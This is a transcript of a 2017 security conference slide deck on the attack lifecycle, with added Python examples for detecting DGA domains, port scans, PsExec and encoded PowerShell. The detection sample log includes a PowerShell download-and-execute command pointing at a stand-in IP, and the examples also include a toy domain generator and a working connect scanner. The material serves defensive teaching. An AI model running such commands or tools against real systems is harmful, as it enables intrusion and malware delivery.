
Ntxissacsc5 blue 4-the-attack_life_cycle_erich_mueller


  1. NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5. The Attack Lifecycle – Conquering All Stages of an Attack. Erich Mueller, Solutions Engineer, Cybereason. November 10, 2017
  2. Hunting for the Adversary. Attacker capabilities by cost, from hardest to cheapest: Innovation (tough!); Custom development (challenging); Botnet, hacked server, hosting ($20); Stolen credit card ($5); Obfuscator ($0.05); Rebuild code ($0.00)
  3. Are you under attack? Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  4. External Recon • People / social engineering: conferences; calling the help desk or an admin • Technology: external scans; buying information and tools on the black market • Business intelligence: trusted relationships; 3rd-party vendors. “Even Rao, a highly experienced cybersecurity researcher, nearly fell for the scam, as he happened to have recently mailed a package via UPS.”
  5. Initial Infection • Phishing and spear phishing • Vulnerability exploit • Infected USB drive
  6. Initial Infection: Process Injection. Running a procedure as a thread inside another process • Evasion • Reading host process memory • Affecting host process behavior • Server persistence
  7. Initial Infection: Fileless Malware. Malicious code launches and carries out an infection from within a legitimate tool or process. Unlike traditional malware it does not drop a file to disk; it runs in the device's memory. Examples of abused processes/tools: legitimate Windows processes; Windows Management Instrumentation (WMI); Meterpreter; remote command execution.
  8. Command & Control. Why: establish and maintain a connection to execute malicious code, update the malware, send back collected information, and provide a heartbeat showing the attack is still alive. How: legitimate-looking HTTP; legitimate-looking DNS requests; fast flux; Tor; IRC; Facebook / Twitter / YouTube comments; domain generation algorithms.
  9. Command & Control: Domain Generation Algorithm • C&C servers quickly get blacklisted • A DGA generates thousands of candidate domains • Predictable to the attacker, unpredictable to the security researcher until the algorithm is reverse engineered from a sample • Only one of them needs to be the live C&C • When that C&C domain is blacklisted, the attacker selects another generated domain, registers it, and continues the attack
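As an added illustration of the DGA slide (this is not from the deck or from Cybereason), the Python below pairs a toy seed-based generator with the lexical check a defender can run over resolver logs. The LCG constants, label lengths, scoring thresholds, host addresses and log lines are all made up for the example.

```python
"""Added example (not from the talk): a toy date-seeded DGA beside a detector
that scores query names from constructed resolver log lines. The LCG
constants, the label lengths and the scoring thresholds are illustrative."""
from __future__ import annotations

import math
from collections import Counter

TLDS = ("com", "net", "org", "info")
VOWELS = set("aeiou")


def generate_dga_domains(seed: int, count: int = 8) -> list[str]:
    """Toy DGA: a 32-bit LCG seeded with a YYYYMMDD integer. Malware and
    operator share the algorithm, so both can compute today's list; the
    operator registers one domain and moves to the next when it is
    blacklisted. A defender who recovers the algorithm from a sample can
    compute the same list and sinkhole or block it ahead of time."""
    state = seed & 0xFFFFFFFF
    domains = []
    for _ in range(count):
        state = (1103515245 * state + 12345) & 0xFFFFFFFF
        length = 12 + (state >> 16) % 5          # 12..16 letters
        label = []
        for _ in range(length):
            state = (1103515245 * state + 12345) & 0xFFFFFFFF
            label.append(chr(ord("a") + (state >> 16) % 26))
        state = (1103515245 * state + 12345) & 0xFFFFFFFF
        domains.append("".join(label) + "." + TLDS[(state >> 16) % len(TLDS)])
    return domains


def shannon_entropy(text: str) -> float:
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0


def registrable_label(fqdn: str) -> str:
    """Label directly under the TLD ('www.example.com' -> 'example'). Assumes a
    single-label TLD; a production detector would use the public suffix list."""
    parts = fqdn.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(fqdn: str) -> dict:
    """Lexical features of the registrable label plus a verdict. Human-chosen
    names have vowels spread through them; random-letter labels usually do not."""
    label = registrable_label(fqdn)
    if not label:
        return {"label": label, "suspicious": False}
    vowel_ratio = sum(ch in VOWELS for ch in label) / len(label)
    run = longest = 0
    for ch in label:
        run = run + 1 if ch.isalpha() and ch not in VOWELS else 0
        longest = max(longest, run)
    entropy = round(shannon_entropy(label), 2)
    return {
        "label": label,
        "length": len(label),
        "entropy": entropy,
        "vowel_ratio": round(vowel_ratio, 2),
        "consonant_run": longest,
        "suspicious": len(label) >= 10
        and (vowel_ratio <= 0.25 or longest >= 5 or entropy >= 3.8),
    }


# Constructed resolver log (timestamp, client, queried name); not real traffic.
SAMPLE_DNS_LOG = """\
2017-11-10T09:01:02 10.0.0.15 www.example.com
2017-11-10T09:01:03 10.0.0.15 updates.microsoft.com
2017-11-10T09:01:07 10.0.0.23 qhzxkvtwnrpbfdl.net
2017-11-10T09:01:08 10.0.0.23 kzrmwvtxqhpndjb.info
2017-11-10T09:01:09 10.0.0.23 mail.google.com
2017-11-10T09:01:11 10.0.0.23 xwtrzkqvhmpnjfd.com
"""


def flag_dga_queries(log_text: str) -> dict[str, list[str]]:
    """{client: [suspicious names]}. Grouping by client matters: a DGA host
    emits a burst of such names (most are never registered, so they come back
    NXDOMAIN) while it probes for the one the operator actually registered."""
    flagged: dict[str, list[str]] = {}
    for line in log_text.splitlines():
        _ts, client, qname = line.split()
        if dga_score(qname)["suspicious"]:
            flagged.setdefault(client, []).append(qname)
    return flagged


if __name__ == "__main__":
    print("today's candidates:", generate_dga_domains(20171110))
    print("flagged:", flag_dga_queries(SAMPLE_DNS_LOG))
```

The lexical score alone produces false positives on CDN and cloud hostnames, which is why the detector groups hits per client: one random-looking name is noise, a burst of them from one host alongside NXDOMAIN answers is the pattern worth an alert.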
  10. Privilege Escalation. Why: gain better persistence; dump credentials / impersonate users; operate under the radar. How: exploit vulnerabilities (command-line vulnerabilities, process injection); leverage improper configurations (local admin rights for all users, user lockout policies).
  11. Privilege Escalation: Exploit Windows Vulnerabilities • Windows kernel-mode driver vulnerabilities • Windows Task Scheduler vulnerabilities • Weaknesses in Windows design: User Account Control (UAC) bypasses; DLL search order hijacking
  13. Internal Reconnaissance. Why: paint a picture of the IT infrastructure (who are the administrators? what steps get me closer to my target? what services are running?); identify the target and a path to it. How: ARP scanning; NetBIOS enumeration; port scanning; credential stealing.
  14. Recon: Port Scanning • Services use ports to communicate (HTTP = 80, DNS = 53, etc.) • The attacker scans the subnet to find exposed and exploitable services
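As an added example for the port-scanning slide (not from the deck), the Python below shows both sides of the event: a TCP connect scan, run against a listener the script starts on 127.0.0.1 so it works offline, and the detection a defender gets from counting distinct destination ports per source in flow logs. The addresses, ports, flow records and threshold are made up for the example.

```python
"""Added example (not from the talk): a TCP connect scan, demonstrated against
a listener the script itself starts on 127.0.0.1 so it runs offline, and the
defender's side of the same event: counting distinct destination ports per
source in a constructed flow log. Hosts, ports and the threshold are illustrative."""
from __future__ import annotations

import socket
import threading
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor

# Port-to-service names are guesses from the well-known assignments; a scanner
# only learns that something answered on the port.
WELL_KNOWN = {22: "ssh", 53: "dns", 80: "http", 135: "msrpc", 139: "netbios-ssn",
              443: "https", 445: "microsoft-ds", 3389: "rdp"}


def tcp_probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """Complete the three-way handshake ('connect' scan). Needs no privileges,
    but every probe reaches the service and shows up in its logs."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0


def connect_scan(host: str, ports, timeout: float = 0.5, workers: int = 32) -> list[int]:
    """Probe ports concurrently; return the open ones in ascending order."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        verdicts = list(pool.map(lambda p: tcp_probe(host, p, timeout), ports))
    return sorted(p for p, is_open in zip(ports, verdicts) if is_open)


def start_listener(host: str = "127.0.0.1"):
    """Stand-in for an exposed service: bind an ephemeral port, accept in the background."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(8)
    srv.settimeout(0.2)
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:            # listener closed
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1], stop


def demo_scan() -> dict:
    """Scan one port known to be open and one known to be closed on loopback."""
    srv, open_port, stop = start_listener()
    # Bind and release a second ephemeral port so we have one that is certainly closed.
    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()
    try:
        found = connect_scan("127.0.0.1", [closed_port, open_port])
    finally:
        stop.set()
        srv.close()
    return {"open_port": open_port, "closed_port": closed_port, "found": found,
            "services": {p: WELL_KNOWN.get(p, "unknown") for p in found},
            "scan_matches_listener": found == [open_port]}


# Constructed flow records (src, dst, dport); not real traffic.
SAMPLE_FLOWS = [
    ("10.0.0.23", "10.0.0.5", 22), ("10.0.0.23", "10.0.0.5", 23),
    ("10.0.0.23", "10.0.0.5", 80), ("10.0.0.23", "10.0.0.5", 135),
    ("10.0.0.23", "10.0.0.5", 139), ("10.0.0.23", "10.0.0.5", 443),
    ("10.0.0.23", "10.0.0.5", 445), ("10.0.0.23", "10.0.0.5", 3389),
    ("10.0.0.15", "10.0.0.5", 445), ("10.0.0.15", "10.0.0.5", 445),
    ("10.0.0.15", "10.0.0.7", 80),
]


def detect_port_scanners(flows, threshold: int = 6) -> dict[str, dict[str, int]]:
    """{src: {dst: distinct_ports}} for sources touching >= threshold distinct
    ports on one host. A workstation talking to a file server reuses a few
    ports; touching eight different ones in a short window is recon."""
    ports: dict[tuple[str, str], set[int]] = defaultdict(set)
    for src, dst, dport in flows:
        ports[(src, dst)].add(dport)
    hits: dict[str, dict[str, int]] = {}
    for (src, dst), seen in ports.items():
        if len(seen) >= threshold:
            hits.setdefault(src, {})[dst] = len(seen)
    return hits


if __name__ == "__main__":
    print(demo_scan())
    print(detect_port_scanners(SAMPLE_FLOWS))
```

Run it on a host you own. The detection side is deliberately simple: it has no time window, so on a real flow feed you would bucket by a few minutes and tune the threshold to what your workstations normally do.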
  15. Recon: Credential Theft • Mimikatz • Windows Credential Editor • LaZagne
  16. Lateral Movement. Why: gain access to target machines (domain controllers, OWA); persistence. How: use legitimate tools maliciously: Pass-the-Hash / Pass-the-Ticket; shares; PsExec; RDP; SSH; PowerShell; SCCM.
  17. Lateral Movement: PsExec. Legitimate use: an IT admin runs PsExec to run a process on a remote machine interactively. Malicious use: an attacker runs PsExec with stolen credential hashes to spread their malware through an entire network.
  18. Lateral Movement: PowerShell. Legitimate use: an IT admin runs PowerShell to monitor the firewall. Malicious use: an attacker runs PowerShell with encoded commands to spread malware.
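As an added example covering the two slides above (PsExec and PowerShell; this is not from the deck), the Python below runs simple detection rules over constructed process-creation and service-install log lines: it decodes `-EncodedCommand` arguments and flags PsExec on both the source host and the target. The host names, users, paths, IP address and sample commands are made up, and the key=value log format is a stand-in for whatever your endpoint telemetry emits.

```python
"""Added example (not from the talk): detection logic for the two lateral
movement tools above, run over constructed process-creation and service-install
log lines (key=value, modelled loosely on Windows events 4688/7045). Hosts,
users, paths and the sample commands are made up; the rules are illustrative."""
from __future__ import annotations

import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
KEY_VALUE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SUSPICIOUS = re.compile(r"\biex\b|invoke-expression|downloadstring|frombase64string|"
                        r"invoke-command|new-pssession|enter-pssession|-computername")
PSEXEC_TARGET = re.compile(r"\\\\(\S+)")   # PsExec's \\hostname argument


def encode_command(script: str) -> str:
    """How -EncodedCommand arguments are built: UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_command. base64 errors propagate: a value the log
    truncated should fail loudly, not silently decode to nothing."""
    return base64.b64decode(b64).decode("utf-16-le")


def parse_event(line: str) -> dict[str, str]:
    return {k: v.strip('"') for k, v in KEY_VALUE.findall(line)}


def analyse_event(line: str) -> list[dict]:
    ev = parse_event(line)
    host = ev.get("host", "?")
    image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("cmd", "")
    findings: list[dict] = []
    if ev.get("event") == "7045" and ev.get("service", "").upper() == "PSEXESVC":
        # PsExec copies PSEXESVC.exe to the target's ADMIN$ share and installs it as a service.
        findings.append({"host": host, "rule": "psexec-service-install", "detail": ev.get("path", "")})
    if image in ("psexec.exe", "psexec64.exe"):
        m = PSEXEC_TARGET.search(cmd)
        findings.append({"host": host, "rule": "psexec-client", "user": ev.get("user", "?"),
                         "target": m.group(1) if m else "?", "detail": cmd})
    if image == "psexesvc.exe":
        findings.append({"host": host, "rule": "psexec-service-process", "detail": cmd})
    if image in ("powershell.exe", "pwsh.exe"):
        m = ENCODED_ARG.search(cmd)
        if m:
            decoded = decode_encoded_command(m.group(1))
            findings.append({"host": host, "rule": "encoded-powershell", "user": ev.get("user", "?"),
                             "tokens": sorted(set(SUSPICIOUS.findall(decoded.lower()))),
                             "detail": decoded})
    return findings


def triage(lines) -> list[dict]:
    return [f for line in lines for f in analyse_event(line)]


ATTACKER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"

# Constructed log lines; the encoded command is built with encode_command() above.
SAMPLE_LOG = [
    'event=4688 host=WS01 user=CORP\\jdoe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmd="powershell.exe -NoProfile -Command Get-NetFirewallProfile"',
    'event=4688 host=WS01 user=CORP\\jdoe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    f'cmd="powershell.exe -nop -w hidden -enc {encode_command(ATTACKER_SCRIPT)}"',
    'event=4688 host=WS01 user=CORP\\jdoe image=C:\\Tools\\PsExec.exe '
    'cmd="PsExec.exe \\\\FS01 -accepteula -s cmd.exe /c c:\\temp\\update.exe"',
    'event=7045 host=FS01 service=PSEXESVC path=%SystemRoot%\\PSEXESVC.exe',
    'event=4688 host=FS01 user="NT AUTHORITY\\SYSTEM" image=C:\\Windows\\PSEXESVC.exe cmd="C:\\Windows\\PSEXESVC.exe"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding["host"], finding["rule"], finding.get("target", ""), finding["detail"][:70])
```

The admin's firewall query on the first line produces no finding; the encoded launcher is decoded and tagged with the download-and-execute tokens it contains, and the PsExec session is seen three times: the client on WS01, the service install on FS01, and PSEXESVC.exe running as SYSTEM on FS01. Renaming psexec.exe defeats the image-name rules, which is why the service-install and service-process rules on the target matter more than the client-side one.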
  19. Lateral Movement: Pass-the-Ticket. Legitimate authentication: Kerberos
  20. Lateral Movement: Pass-the-Ticket. Malicious use: Pass the Ticket
  21. Persistence. Why: establish long-term access; the primary goal is often persistent access. How: scheduled tasks; autoruns; temp files; fileless malware.
  22. Damage. Exfiltration channels: FTP/SSH; email; DNS; Dropbox; Pastebin. Impact: ransomware; corporate financials; credit card data; system corruption. Motives: business, profit, sabotage.
  23. Are you under attack? Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
  24. Total Enterprise Protection
  25. A Layered Approach to Security
  26. Thank you
